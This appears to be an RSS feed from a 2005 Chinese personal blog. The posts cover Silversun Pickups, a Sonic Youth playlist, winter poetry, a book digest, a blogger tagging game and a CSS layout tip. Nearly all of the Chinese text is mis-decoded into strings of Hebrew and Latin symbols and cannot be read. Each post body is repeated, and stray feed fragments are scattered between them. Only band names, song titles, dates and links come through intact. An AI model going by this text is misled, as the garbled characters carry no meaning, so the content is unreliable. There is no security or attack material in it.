    ׃ַ·­³צ²»¿ֹ׀¡¿´µִsilversunpickups£¬µ±±ײ»ַעעׁµדֻ®£¨½«comeback kid׳ק־×±³¾°ׂפ£©£¬¾­¹‎¼¸¸צװֲ²¥·ֲֵµִ¼לׁי£¬ְׂ¾ֹװ־ׂµִ׃²ֵּױ¼׃׀ׂ»ֿ¯ײ®µ״¡£ִַ־ׂ¾ֽµֳ÷ֳ÷ֳ׳ֱִ¥ׂ»ֲֿ־ׂµ½µ׳־ײֳ´ֱפֲֳַֻֿ¡£±ָ½ֿ¿ֹ׀¦µִַ־ׂµׂ»´־ּ‎ֳַֻ²¢ֳ»׃׀ּ‎³צµ½µ׳ֵַ®ײקׂפ»¹ִַ׀ײקׂפ¡££¨׃ײֿכֶנKim Gordonµִִַ°ֳׁװָֹֻ₪ׂפֱֻ£©½¥½¥µִ²ֵ·¢ֿײֳֵµְ£¬±ָ½ּֿנְֳ³ֱ¾²µִִַ¸צִַ׀ֹש£¬±ָ½ֿ´ײ²¿סׂ°µִִַ¸צֵַ®ֹש¡£÷ֳ°ֹ£¬ֳָ־ׂ½׃ױג¸צֲµ£¬ׂע־ײ»ֲִ׀ֵ®ֹש׳µִ¶¼ַ־ֿׂ²»¶µֲִ·ֿ¡£ֳַֻµִֽרױ¾ױׂ׀©ֻֿק¿´µֳ־ׁׂ»¨חװֲׂ£¬ֲפֿאױזµִ²»¸ׂ¹§־¬¡£¿´µ½ֵ®ֹשµִײקָֻ²ָ»ַ¸צ³₪ְֳָָֻֽ£¬׃ַֻ«׳׃¿×¼ֵ״ֿרֱֻ£÷ֳָױג´םְֲׂ´µֳ¸ֱֳֽׂ׀©°ֹ¡£

    -

    ־ַׂ¸צ³§ֳֵֶ₪£¬ֱֳַֻ¥פ׃DangerBirdRecords£¬µ«ֶַלֲֿ־ׂ²¢²»ײ×µְ»¹׃׀ֶהֻ²ֳ´ָֿ¶µִֵֽ¶׃£¬ֳִַ´¾ִֽדִג¶¨־×ֲֿׂ»½׳¶־µִׁ׀¾¿¶װֿף°ֹ¡£·¢ֿײ¸ש¾ִדֿ²»¶µִֵֽ¶׃ָ¥·­³§ֵֶױׂ׳װ¼÷ֿ²»¶µִֶהֻ¶«־ק÷¡ֱ¦£¬ױגֶהײ׀µִׂ»´ףװ­ְם¾ֽ¸תֱתֹתֱת£¬·ןֹת·ןׂ»ׁשµִµְְם£¬½²¾¿µדֵׂ´«»שׂעµִ¡£

    -]]>
    - ֻ‎µִ׀ְִןׂ»¸צֹשׂפװ÷°½׀׳ֵ£÷ַכװpowerׂ»׀©¡£ -

    ׃ַ·­³צ²»¿ֹ׀¡¿´µִsilversunpickups£¬µ±±ײ»ַעעׁµדֻ®£¨½«comeback kid׳ק־×±³¾°ׂפ£©£¬¾­¹‎¼¸¸צװֲ²¥·ֲֵµִ¼לׁי£¬ְׂ¾ֹװ־ׂµִ׃²ֵּױ¼׃׀ׂ»ֿ¯ײ®µ״¡£ִַ־ׂ¾ֽµֳ÷ֳ÷ֳ׳ֱִ¥ׂ»ֲֿ־ׂµ½µ׳־ײֳ´ֱפֲֳַֻֿ¡£±ָ½ֿ¿ֹ׀¦µִַ־ׂµׂ»´־ּ‎ֳַֻ²¢ֳ»׃׀ּ‎³צµ½µ׳ֵַ®ײקׂפ»¹ִַ׀ײקׂפ¡££¨׃ײֿכֶנKim Gordonµִִַ°ֳׁװָֹֻ₪ׂפֱֻ£©½¥½¥µִ²ֵ·¢ֿײֳֵµְ£¬±ָ½ּֿנְֳ³ֱ¾²µִִַ¸צִַ׀ֹש£¬±ָ½ֿ´ײ²¿סׂ°µִִַ¸צֵַ®ֹש¡£÷ֳ°ֹ£¬ֳָ־ׂ½׃ױג¸צֲµ£¬ׂע־ײ»ֲִ׀ֵ®ֹש׳µִ¶¼ַ־ֿׂ²»¶µֲִ·ֿ¡£ֳַֻµִֽרױ¾ױׂ׀©ֻֿק¿´µֳ־ׁׂ»¨חװֲׂ£¬ֲפֿאױזµִ²»¸ׂ¹§־¬¡£¿´µ½ֵ®ֹשµִײקָֻ²ָ»ַ¸צ³₪ְֳָָֻֽ£¬׃ַֻ«׳׃¿×¼ֵ״ֿרֱֻ£÷ֳָױג´םְֲׂ´µֳ¸ֱֳֽׂ׀©°ֹ¡£

    -

    ־ַׂ¸צ³§ֳֵֶ₪£¬ֱֳַֻ¥פ׃DangerBirdRecords£¬µ«ֶַלֲֿ־ׂ²¢²»ײ×µְ»¹׃׀ֶהֻ²ֳ´ָֿ¶µִֵֽ¶׃£¬ֳִַ´¾ִֽדִג¶¨־×ֲֿׂ»½׳¶־µִׁ׀¾¿¶װֿף°ֹ¡£·¢ֿײ¸ש¾ִדֿ²»¶µִֵֽ¶׃ָ¥·­³§ֵֶױׂ׳װ¼÷ֿ²»¶µִֶהֻ¶«־ק÷¡ֱ¦£¬ױגֶהײ׀µִׂ»´ףװ­ְם¾ֽ¸תֱתֹתֱת£¬·ןֹת·ןׂ»ׁשµִµְְם£¬½²¾¿µדֵׂ´«»שׂעµִ¡£

    -]]>
    - http://www.plastiku.com/index.php/182/feed/ -
    - - ¶¬ָױֲֿ־חµִׁפ¹ג - http://www.plastiku.com/index.php/181/ - http://www.plastiku.com/index.php/181/#comments - Fri, 09 Dec 2005 17:30:33 +0000 - Kelet - - lifeplay - http://www.plastiku.com/index.php/181/ - flickr share²»ײ×־×÷־ּלֶר±הְהײ®÷ף£¬ֳ¿µ½ֲֿ־חֽ׳ִֵַ³הֵזµִׁפ¹ג£¬¾ֽ׳»בֿכֶנ´ףׁ§ֹֻבֳ»׃׀¿־µֲִֿ־ח£¬¼¸¸צָֻװֹֻבֱִּל»עױ¿´י£¬ׂ²ַױגֳ´ֵ¯µִׁפ¹ג¡£ײ»ַµ״µד÷ָֻֽ־ן¶¼²»¶װֱֻ¡£ַ·ס»ב÷ֽ־ׂׂ»ׁשֶ¯¸¡ֶנױגׁשµִ׀ִַיִ״£¿·ֲ·נ»¹´©ֻףװֱִַֿ³₪µִ׳ְָ,ֵ¯ֵ¯µִׁפ¹גֳָ־ֿׂכֶנµִִַדֳַ¸ֹװןױז³ֿµִ׀¦ֱ³£¬ֱטֲׂ²ײ´µִ±¼ַ£¬ֱֹֻ¸½נֹ«¹גֳ¢µִֽ··¢ֹׂ£¬ַ׳ַ׀µִ¿ֽ·לר¡£׳½ר½ִּׂדֳַ¶¼»¹װ£¬»״µ½ֹֻבִדֳַ¶¼»¹װ¡£

    -
    -

    -²»ײײ»¾ץָֻ¾­¹‎ֱֻ÷ֳ¶אִך
    -־ָׂ´ּ״±נָׂ׳ֿכִמִד
    -¾ְֳָֽ½חׂע־×־ֽׂ£ְֲֿ´
    -ׁ°ױׂ־ֳַּׂלױזµִ°®
    -־ֳַׂ´םװׂװ־×׳װּׁׂ«³ֹל
    -װ­ְ´װ­ֱֲ÷ֳִֻׁµ³צ¿
    -װֹתֳײ®ײ׀ײ»ַ²ֱ¼ח¶ר¹‎
    -µ«ִד¶װ־ּׂ״±נײ״ׂ×
    -׃ײ¹‎ֱֻׂ»¸צַןּל¶¬ּל¿לְ´
    -ּ״±נָׂ׳ֿכִמ
    -׳ְֹֿµִױױֶ¬־ֳַׂ׀ֹ¬µֱִ³
    -´׃ְ´ֳ»׃׀¸ִ±ה

    -

    ָ¡ֱַֻןּל¶¬ּלµִ²¿·ײ¸ט´

    -
    - -

    Bgsound:ױֵױנװְ¡¶ַןּל¶¬ּל¡·£¬±ךּגַֻµֱִםׂ»׳¸טַתְֳִ´׃ֳ׳ֱֵֻ¡£±ָ½ֿֿ²»¶ױֵױנװְµֲִ‎¸ט£¬ׂ²ַױנµ´׀־µִ¸׀¶¯£¬²ד²דµ‏µ‏ֽֿם³¶ר³צµִ¼¸¸צ¼עµ¥ׂפ·´®¾ֽ½«ִדµִַי׀קµק²¦µ½׳מ׃¦¾°µִ׳´ּ¬¡£

    ]]>
    - flickr share²»ײ×־×÷־ּלֶר±הְהײ®÷ף£¬ֳ¿µ½ֲֿ־חֽ׳ִֵַ³הֵזµִׁפ¹ג£¬¾ֽ׳»בֿכֶנ´ףׁ§ֹֻבֳ»׃׀¿־µֲִֿ־ח£¬¼¸¸צָֻװֹֻבֱִּל»עױ¿´י£¬ׂ²ַױגֳ´ֵ¯µִׁפ¹ג¡£ײ»ַµ״µד÷ָֻֽ־ן¶¼²»¶װֱֻ¡£ַ·ס»ב÷ֽ־ׂׂ»ׁשֶ¯¸¡ֶנױגׁשµִ׀ִַיִ״£¿·ֲ·נ»¹´©ֻףװֱִַֿ³₪µִ׳ְָ,ֵ¯ֵ¯µִׁפ¹גֳָ־ֿׂכֶנµִִַדֳַ¸ֹװןױז³ֿµִ׀¦ֱ³£¬ֱטֲׂ²ײ´µִ±¼ַ£¬ֱֹֻ¸½נֹ«¹גֳ¢µִֽ··¢ֹׂ£¬ַ׳ַ׀µִ¿ֽ·לר¡£׳½ר½ִּׂדֳַ¶¼»¹װ£¬»״µ½ֹֻבִדֳַ¶¼»¹װ¡£

    -
    -

    -²»ײײ»¾ץָֻ¾­¹‎ֱֻ÷ֳ¶אִך
    -־ָׂ´ּ״±נָׂ׳ֿכִמִד
    -¾ְֳָֽ½חׂע־×־ֽׂ£ְֲֿ´
    -ׁ°ױׂ־ֳַּׂלױזµִ°®
    -־ֳַׂ´םװׂװ־×׳װּׁׂ«³ֹל
    -װ­ְ´װ­ֱֲ÷ֳִֻׁµ³צ¿
    -װֹתֳײ®ײ׀ײ»ַ²ֱ¼ח¶ר¹‎
    -µ«ִד¶װ־ּׂ״±נײ״ׂ×
    -׃ײ¹‎ֱֻׂ»¸צַןּל¶¬ּל¿לְ´
    -ּ״±נָׂ׳ֿכִמ
    -׳ְֹֿµִױױֶ¬־ֳַׂ׀ֹ¬µֱִ³
    -´׃ְ´ֳ»׃׀¸ִ±ה

    -

    ָ¡ֱַֻןּל¶¬ּלµִ²¿·ײ¸ט´

    -
    - -

    Bgsound:ױֵױנװְ¡¶ַןּל¶¬ּל¡·£¬±ךּגַֻµֱִםׂ»׳¸טַתְֳִ´׃ֳ׳ֱֵֻ¡£±ָ½ֿֿ²»¶ױֵױנװְµֲִ‎¸ט£¬ׂ²ַױנµ´׀־µִ¸׀¶¯£¬²ד²דµ‏µ‏ֽֿם³¶ר³צµִ¼¸¸צ¼עµ¥ׂפ·´®¾ֽ½«ִדµִַי׀קµק²¦µ½׳מ׃¦¾°µִ׳´ּ¬¡£

    ]]>
    - http://www.plastiku.com/index.php/181/feed/ - -
    - - Think about sonic guitar - http://www.plastiku.com/index.php/180/ - http://www.plastiku.com/index.php/180/#comments - Sun, 04 Dec 2005 03:50:28 +0000 - Kelet - - ׂפְײ³ז׳׃/musicGrungesonicyouth - http://www.plastiku.com/index.php/180/ - sonic youth׃ֹ׃Kim Gordonִַײײֹ³ֶׁµִ±»¸¯´°ד׀װ¸׀µִֹשׂפ£¬ֻשׂװ·מ־×־ׂ׳מֿ²»¶µִֵ®ֹשײק³×¡£ײֱ׃Thurston׃µ׃׀ׂ»¸±»¶׃­µִ±ך׳¼ֽג±ם£¬ֽג¼׃ֻµִֹשׂפׂ²ַ³ײ׀ר²»ְֿµִ±£³ײ׳ֱֵמֳָֻװֱµµִ±ך׳¼ׂ¡¹צַ»¡££¨־ײֳ´ֳַֻµִֹשׂפ¶¼²»»בְִֿ״£¿£¡£¡£©¶תײײ»·ֶָ׳ֵ¸ֳ¶ָµִ¼×ֻ׀‎ֲֹ£¬ָׁׂל׃ױגׁש¡°ֽזֳµ״¡±ֻ¢׳ֳֵַַֻֿׂװץֳ´²»»בְִ״£¬ָ»÷ף·ֲ·נ׳װ־׳װ´נ°דױׂµ½ׂ»¸צ÷ְֿם½גֽ£¬־ײֳ´׃׀ָ‎°ׁ¼×ִֻ״£¬´ף¸ְֵµִ±÷ע»¹¿ֹׂװֲײ»»ׂ»ֲֿ°ֹ¡£׳װ־ׂ¸׀¾ץthurstonµִ¼×ֻ±ָ½ֿ־ִ¾²ׂ»׀©£¨ײ»ִֿכµ½ױג¸צ´ֱֻ¼ר׃ֻµִֽגֳ²÷ֽׂ»·שִ°ׁshoegazing½ר׀׀µ½µ׳µִַ»µק£©£¬¾ֻֽדֽז»¨ׁש»¹ַ÷ַ«÷ֽµִ£»µ«ַJim¾ֽ²»ׂ»ׁש£¬°ַׁµְ´µ¹ָ¥µִ÷׃׀poseµִׁש׳׃£¬¶רַׂ÷»בױױ¹ֻּ¨ֲֿ¹ײֶֻµִ¡£Leeµִֹשׂפׂ²»¹²»´ם£¬µ«ַװָח´ֱֹֻׂ«µֱִםֽגֱ½־»µִֹשׂפֲֿµװ²»ּ«ׂ‎ָֻ׳¢ׂג°¢¡£-_,-

    -
    -12װֲradioָ«²¿¶¼ַsonic youth,¸׀ֲָחֲֿ: -
      -
    1. 01 - Teen Age Riot¡¶ Daydream Nation¡·
    2. -
    3. 02 - Silver Rocket¡¶ Daydream Nation¡·
    4. -
    5. 03 - Hey Joni¡¶ Daydream Nation¡·
    6. -
    7. 04 - Candle¡¶ Daydream Nation¡·
    8. -
    9. 05 - Sugar Kane¡¶Dirty¡·
    10. -
    11. 06 - Starfield Road¡¶Expermental Jet Set ¡·
    12. -
    13. 07 - Nevermind (What Was It Anyway)¡¶NYC Ghosts & Flowers ¡·
    14. -
    15. 08 - NYC Ghosts & Flowers¡¶NYC Ghosts & Flowers ¡·
    16. -
    17. 09 - I Love Golden Blue¡¶Sonic Nurse¡·
    18. -
    19. 10- Peace Attack¡¶Sonic Nurse¡·
    20. -
    -
    -

    ֱם£÷Alienµִblogֳֹֿז½יֹµִA Northern Chorus³¬װ¡£ׂ²׀םֻµִ׳¨¼­µִ׀´«׃ן¿ֹׂװױגֳ´׀´£÷for the winter ,for the people in th winter

    ]]>
    - sonic youth׃ֹ׃Kim Gordonִַײײֹ³ֶׁµִ±»¸¯´°ד׀װ¸׀µִֹשׂפ£¬ֻשׂװ·מ־×־ׂ׳מֿ²»¶µִֵ®ֹשײק³×¡£ײֱ׃Thurston׃µ׃׀ׂ»¸±»¶׃­µִ±ך׳¼ֽג±ם£¬ֽג¼׃ֻµִֹשׂפׂ²ַ³ײ׀ר²»ְֿµִ±£³ײ׳ֱֵמֳָֻװֱµµִ±ך׳¼ׂ¡¹צַ»¡££¨־ײֳ´ֳַֻµִֹשׂפ¶¼²»»בְִֿ״£¿£¡£¡£©¶תײײ»·ֶָ׳ֵ¸ֳ¶ָµִ¼×ֻ׀‎ֲֹ£¬ָׁׂל׃ױגׁש¡°ֽזֳµ״¡±ֻ¢׳ֳֵַַֻֿׂװץֳ´²»»בְִ״£¬ָ»÷ף·ֲ·נ׳װ־׳װ´נ°דױׂµ½ׂ»¸צ÷ְֿם½גֽ£¬־ײֳ´׃׀ָ‎°ׁ¼×ִֻ״£¬´ף¸ְֵµִ±÷ע»¹¿ֹׂװֲײ»»ׂ»ֲֿ°ֹ¡£׳װ־ׂ¸׀¾ץthurstonµִ¼×ֻ±ָ½ֿ־ִ¾²ׂ»׀©£¨ײ»ִֿכµ½ױג¸צ´ֱֻ¼ר׃ֻµִֽגֳ²÷ֽׂ»·שִ°ׁshoegazing½ר׀׀µ½µ׳µִַ»µק£©£¬¾ֻֽדֽז»¨ׁש»¹ַ÷ַ«÷ֽµִ£»µ«ַJim¾ֽ²»ׂ»ׁש£¬°ַׁµְ´µ¹ָ¥µִ÷׃׀poseµִׁש׳׃£¬¶רַׂ÷»בױױ¹ֻּ¨ֲֿ¹ײֶֻµִ¡£Leeµִֹשׂפׂ²»¹²»´ם£¬µ«ַװָח´ֱֹֻׂ«µֱִםֽגֱ½־»µִֹשׂפֲֿµװ²»ּ«ׂ‎ָֻ׳¢ׂג°¢¡£-_,-

    -
    -12װֲradioָ«²¿¶¼ַsonic youth,¸׀ֲָחֲֿ: -
      -
    1. 01 - Teen Age Riot¡¶ Daydream Nation¡·
    2. -
    3. 02 - Silver Rocket¡¶ Daydream Nation¡·
    4. -
    5. 03 - Hey Joni¡¶ Daydream Nation¡·
    6. -
    7. 04 - Candle¡¶ Daydream Nation¡·
    8. -
    9. 05 - Sugar Kane¡¶Dirty¡·
    10. -
    11. 06 - Starfield Road¡¶Expermental Jet Set ¡·
    12. -
    13. 07 - Nevermind (What Was It Anyway)¡¶NYC Ghosts & Flowers ¡·
    14. -
    15. 08 - NYC Ghosts & Flowers¡¶NYC Ghosts & Flowers ¡·
    16. -
    17. 09 - I Love Golden Blue¡¶Sonic Nurse¡·
    18. -
    19. 10- Peace Attack¡¶Sonic Nurse¡·
    20. -
    -
    -

    ֱם£÷Alienµִblogֳֹֿז½יֹµִA Northern Chorus³¬װ¡£ׂ²׀םֻµִ׳¨¼­µִ׀´«׃ן¿ֹׂװױגֳ´׀´£÷for the winter ,for the people in th winter

    ]]>
    - http://www.plastiku.com/index.php/180/feed/ -
    - - ¼ַµֳ¡¶ױ‎־חµֲִֻ¡· - http://www.plastiku.com/index.php/179/ - http://www.plastiku.com/index.php/179/#comments - Sat, 26 Nov 2005 12:48:13 +0000 - Kelet - - ¶ֱ־ִ¼ַ - Digest - http://www.plastiku.com/index.php/179/ - ֵ¼ָ»װ´־¶ֱµ½ױג׳£¬¾ֽֿס׃צ¼¶אִך²»¼µְִֿ׃ׁ£¬ֳ»׃׀ײ®ַ°¿ּׂגµִׁ°ױׂ£¬µ«ַ׃צ¼±³הֲת׳ֳֵמ²»¿ֹׁװµִֿ²װֳ¡£µ±ִךױ×ֲ¼µִ±¾׳׃װחׁׂ²»¼£¬ײ»¼ַµֳּגִ¿÷ֽ«ָֻµֳִ׳ײ£¬ׂװ¼°ְֳִַל׃׀ִµִµָ‎¶־£¬ֵיָ»´עײ׀ִַ־׳ֹ³₪ֻשֳװֳ£÷ֽ־×ׁ§ֿ°ֻשְµִ׀ִ£¬µׂ»´־¿×¼־׫¸ט¶ר¸׀¶¯¡£ -

    -
      -
    • ¡¶ױ‎־חµֲִֻ¡·
    • -
    • °¢׀ֵ
    • -
    • ַא²µִֶרֿ¢ׁ¬ָֻ׃בE¡£ֲךַתׂװ־ק
    • -
    • ֱשײ»²״ֹםֽ¼÷ץֲֻ±»­ֹֿµִ°׳ֳֽ
    • -
    • ֳ׀·לֶנׁ¾¦¡£ׂ»׀¡¿יׂץ׃°
    • -
    • ֻז׳ֵָ²ײְ®ֲן
    • -
    • ´ףִװײ׀װחִךֱפֲֿµִׂ»µדµד׀ִ²¡
    • -
    • װ°׳ֻ‏÷ֽ¾­ֳּײ®¼הµִ¿ױµ״ֹֿ»÷»÷ֶׂ¶¯
    • -
      -
    • µ±ָ»ֳ»׃׀·ח¡£ֽ­װ³צ÷¹¾­ב¦װתׁ
    • -
    • ¯¹״ְןׂ»ֽ·¨׳׃
    • -
    • ױ‎ֳ־¼·נװ´עםן׃¥װֻ¯¾ץ
    • -
    • ׂ°»¨µִֿדֶר´¹ֿעׂ»¸צֽהַתµִ־ח÷ף
    • -
    • ֹ½ֲֶֹֿׂ»ֶ¥°׳ֲםµִ°²¾²£¬׃כֲֻװ÷½נ¶¥
    • -
    • ¹¹³ֹׂ»ײײֳָָֻ׀ִ׀י²»ׁׂµִ½ַ¶ָ
    • -
      -
    • ¶רְ­ָר²»װ¶£¬±±¾©÷ֵֽ¦װ¼ׂ²¸ֶהׂ£װ¶
    • -
    • ´¥ײ¿ֹ¼°µִ¾­¾ם¡¢¾ןל¡¢ֹ®ֹא£¬ׂװ¼°
    • -
    • ִָׂ¹µִ·¢±ט£¬ֶֻ÷ץ¸װ¶¨D¨Dµ±ִַ¸צ
    • -
    • װ»טֻ¯ײ׀´ע׳רµִֹ®ָֻ
    • -
    • ־ׂג¼ה»״ֽ·¿´ֱֻ־ׂׂ»ׁ
    • -
      -
    • ־ׂ׳µֳ»״ָ¥¡£µ«ׂ²²»ַ
    • -
    • ²ײ»¼הµִּ׃ֽצ¡£µ±־ׂװֹ½ֲֿµ״ֿ×ֻ®ֵװ׳רµ״
    • -
    • ֻ®ֲ‏¹‎½ֵ±³£¬׳¾ץµֳֹםּוײ׀ׂ»׀©÷³ֱµִ
    • -
    • ¶«־ק£¬ׁׂ¾­׃ְװ¶µ״׃שװֱֻ
    • -
    • ִָֿױָ÷ֹ½µִִךֽ¼÷ץֲֻ¡£
    • -
    -
    - -

    Bgsound: IVY -Nothing but the sky

    ]]>
    - ֵ¼ָ»װ´־¶ֱµ½ױג׳£¬¾ֽֿס׃צ¼¶אִך²»¼µְִֿ׃ׁ£¬ֳ»׃׀ײ®ַ°¿ּׂגµִׁ°ױׂ£¬µ«ַ׃צ¼±³הֲת׳ֳֵמ²»¿ֹׁװµִֿ²װֳ¡£µ±ִךױ×ֲ¼µִ±¾׳׃װחׁׂ²»¼£¬ײ»¼ַµֳּגִ¿÷ֽ«ָֻµֳִ׳ײ£¬ׂװ¼°ְֳִַל׃׀ִµִµָ‎¶־£¬ֵיָ»´עײ׀ִַ־׳ֹ³₪ֻשֳװֳ£÷ֽ־×ׁ§ֿ°ֻשְµִ׀ִ£¬µׂ»´־¿×¼־׫¸ט¶ר¸׀¶¯¡£ -

    -
      -
    • ¡¶ױ‎־חµֲִֻ¡·
    • -
    • °¢׀ֵ
    • -
    • ַא²µִֶרֿ¢ׁ¬ָֻ׃בE¡£ֲךַתׂװ־ק
    • -
    • ֱשײ»²״ֹםֽ¼÷ץֲֻ±»­ֹֿµִ°׳ֳֽ
    • -
    • ֳ׀·לֶנׁ¾¦¡£ׂ»׀¡¿יׂץ׃°
    • -
    • ֻז׳ֵָ²ײְ®ֲן
    • -
    • ´ףִװײ׀װחִךֱפֲֿµִׂ»µדµד׀ִ²¡
    • -
    • װ°׳ֻ‏÷ֽ¾­ֳּײ®¼הµִ¿ױµ״ֹֿ»÷»÷ֶׂ¶¯
    • -
      -
    • µ±ָ»ֳ»׃׀·ח¡£ֽ­װ³צ÷¹¾­ב¦װתׁ
    • -
    • ¯¹״ְןׂ»ֽ·¨׳׃
    • -
    • ױ‎ֳ־¼·נװ´עםן׃¥װֻ¯¾ץ
    • -
    • ׂ°»¨µִֿדֶר´¹ֿעׂ»¸צֽהַתµִ־ח÷ף
    • -
    • ֹ½ֲֶֹֿׂ»ֶ¥°׳ֲםµִ°²¾²£¬׃כֲֻװ÷½נ¶¥
    • -
    • ¹¹³ֹׂ»ײײֳָָֻ׀ִ׀י²»ׁׂµִ½ַ¶ָ
    • -
      -
    • ¶רְ­ָר²»װ¶£¬±±¾©÷ֵֽ¦װ¼ׂ²¸ֶהׂ£װ¶
    • -
    • ´¥ײ¿ֹ¼°µִ¾­¾ם¡¢¾ןל¡¢ֹ®ֹא£¬ׂװ¼°
    • -
    • ִָׂ¹µִ·¢±ט£¬ֶֻ÷ץ¸װ¶¨D¨Dµ±ִַ¸צ
    • -
    • װ»טֻ¯ײ׀´ע׳רµִֹ®ָֻ
    • -
    • ־ׂג¼ה»״ֽ·¿´ֱֻ־ׂׂ»ׁ
    • -
      -
    • ־ׂ׳µֳ»״ָ¥¡£µ«ׂ²²»ַ
    • -
    • ²ײ»¼הµִּ׃ֽצ¡£µ±־ׂװֹ½ֲֿµ״ֿ×ֻ®ֵװ׳רµ״
    • -
    • ֻ®ֲ‏¹‎½ֵ±³£¬׳¾ץµֳֹםּוײ׀ׂ»׀©÷³ֱµִ
    • -
    • ¶«־ק£¬ׁׂ¾­׃ְװ¶µ״׃שװֱֻ
    • -
    • ִָֿױָ÷ֹ½µִִךֽ¼÷ץֲֻ¡£
    • -
    -
    - -

    Bgsound: IVY -Nothing but the sky

    ]]>
    - http://www.plastiku.com/index.php/179/feed/ - -
    - - µָ‎´־½׃ֱת - http://www.plastiku.com/index.php/178/ - http://www.plastiku.com/index.php/178/#comments - Tue, 22 Nov 2005 12:02:20 +0000 - Kelet - - ׀¡ֽזׂג - http://www.plastiku.com/index.php/178/ - astonµִױג¸צ½׃ֱ¦ֳָָ־ׂµׂ»´־¿×¼ֿכֱֻֿכױג¸צ־ּג¡£¡£ׂ²׀םַ¼‏÷ֲֳ¡£ -

    -

    ײקּג£÷׀´ֲֿ°ֻ¸צִדְםֿכ°יֲֲµִּץ¼‏¡£ -
    ¹זװעױױ¾ַֹױׂ־ו¸צ½׃°אָֻ£¬װ־ִִ©¸½ֹֿױג־ו¸צָֻµֱִ´½׃£¬²¢ַׂµ½ױג׀©ָֻµִblogֱֹֿפֲֿ£÷¡°ִד±»ּשֱֻ¡£¡±ױג־ו¸צ±»tagµ½µִָֻ£¬׃׳װ¼÷µִblogִ׳¢ֳק£¨²¢¸½ֱֹֿ´½׃£©ַ´׃ִִ¸צbloggerְִַןµ½µִַׁכ¡£ָ»÷ף׀´ֲֿ´נ°¸£¬װָ¥ּשֱםֽג־ו¸צָֻ¡£ָח´ֻֽש¸´¡£

    -

    ±¾ָֻװָֿױזֻ¼¿¼ײ®÷ףײױ׃ֶ´׳ד°ֻµד£÷ -

      -
    1. ױז³ֿ
    2. -
    3. ױ‎ײ±
    4. -
    5. °®¹ת
    6. -
    7. ²»סרװכ
    8. -
    9. ²»¶א³מֶֹ¸׀
    10. -
    11. ָ₪־¶ֿאֽ¶
    12. -
    13. ־ׂל־¶
    14. -
    15. ־ו¹»¹ַׂ×¶ֻױ‎µִ°ֹ¡£¡£¡£
    16. -
    -

    -

    ½׃׳ֵֽז°ֹ£¬¸ק־»£÷waggle£¬ pukka£¬ְֱ£¬ֽשֽש£¬ׂװ¼°װ¸ׂגֱפׁװװ´ֻ׳װ±¬µִִד

    ]]>
    - astonµִױג¸צ½׃ֱ¦ֳָָ־ׂµׂ»´־¿×¼ֿכֱֻֿכױג¸צ־ּג¡£¡£ׂ²׀םַ¼‏÷ֲֳ¡£ -

    -

    ײקּג£÷׀´ֲֿ°ֻ¸צִדְםֿכ°יֲֲµִּץ¼‏¡£ -
    ¹זװעױױ¾ַֹױׂ־ו¸צ½׃°אָֻ£¬װ־ִִ©¸½ֹֿױג־ו¸צָֻµֱִ´½׃£¬²¢ַׂµ½ױג׀©ָֻµִblogֱֹֿפֲֿ£÷¡°ִד±»ּשֱֻ¡£¡±ױג־ו¸צ±»tagµ½µִָֻ£¬׃׳װ¼÷µִblogִ׳¢ֳק£¨²¢¸½ֱֹֿ´½׃£©ַ´׃ִִ¸צbloggerְִַןµ½µִַׁכ¡£ָ»÷ף׀´ֲֿ´נ°¸£¬װָ¥ּשֱםֽג־ו¸צָֻ¡£ָח´ֻֽש¸´¡£

    -

    ±¾ָֻװָֿױזֻ¼¿¼ײ®÷ףײױ׃ֶ´׳ד°ֻµד£÷ -

      -
    1. ױז³ֿ
    2. -
    3. ױ‎ײ±
    4. -
    5. °®¹ת
    6. -
    7. ²»סרװכ
    8. -
    9. ²»¶א³מֶֹ¸׀
    10. -
    11. ָ₪־¶ֿאֽ¶
    12. -
    13. ־ׂל־¶
    14. -
    15. ־ו¹»¹ַׂ×¶ֻױ‎µִ°ֹ¡£¡£¡£
    16. -
    -

    -

    ½׃׳ֵֽז°ֹ£¬¸ק־»£÷waggle£¬ pukka£¬ְֱ£¬ֽשֽש£¬ׂװ¼°װ¸ׂגֱפׁװװ´ֻ׳װ±¬µִִד

    ]]>
    - http://www.plastiku.com/index.php/178/feed/ -
    - - µ¼÷½ְ¸µִ´ם־»׃¾ץ - http://www.plastiku.com/index.php/176/ - http://www.plastiku.com/index.php/176/#comments - Sat, 19 Nov 2005 06:22:48 +0000 - Kelet - - CssStaff - BlogStaff - Design - http://www.plastiku.com/index.php/176/ - ׃ֹ׃ִ³¸צ´ם־ף,ֽ»ָ»¾ֽ¸ִ±הֱֻ־ׂׂ»¹ב¶װ׃µ¼÷½ְ¸׃¦µ±¹₪ױµִ¹ִמ.־׀ִ²וֱרµִ־ׂ½«´ם¾ֽ´ם,ֻשׂװ׳מײױ³צְ´µִ¾ִַֽ³ײײ׃¾ץ´ם־»µִµ¼÷½ְ¸,»עױֻµµ±ף±ך»¬¹‎µִ±÷ע,ֳַֻ¾ֽ·ֲ·נװ°¼ֽ¹µִ³ַַ½ײ®¼ה׃כִד׳½ֳװ²״.ֶהµַֽ¦¼עµ¥µִׂ»¸צ׀¡²¼¾ײ¡£

    -

    ´׃´ְֻ©ױ¹³צָ¥£¬ָח¹־ֳַׂ½«ױג¸צ·½·¨׃ֳװױ¾µד׃ַׁיֱ´½׃µִ²¼¾ײ·½½ֳֹֿז£¬ֳִַ´־ֳַׂ¿ֹׂװ׳צ³צׂ»ײײ׃׀±נ׃ׂ»°דµִׂ»¸צ¼עµ¥ֱ´½׃ֱ׀±םµֱִ´½׃»ד¼¯·½½³צְ´£÷½«ֱ´½׃‎ֱ¿³‎ׂװ4£¬µֳµ½µִִַ¸צ‎׳ײ£¨װ±²»¿¼ֲַ׃א‎£©¾ִַֽדֳ¿ׂ»׀׀ֱ´½׃µִ‎ֱ¿£¬ָ»÷ף־ֳַׂ½«ֻש׃׀ױג׀©÷בֿע¡®µ¼÷½ּץ¡¯yֿעׁ׃ֹל£¬·ֵװׂ»¸צdivײ׀£¬ֳִַ´¾ֽ¿ֹׂװ׳מײױ׀־³ֹׂ»¸צ¾״׀־ַר׃עµֱִ´½׃µ״ֽ¼£¬¶ר־ֳַֻׂש׃׀ׂ×׳צµִ¸ִ¶¯½צ½צַװhtmlײ׀±א¼­ֱ´½׃¶רׁׂ£¬css±£³ײװ­ׁש¾ֽok.(ֿךֿ¸ַכ²י¿´¸ֳׂ³ֳזװ´ֲכ)

    -

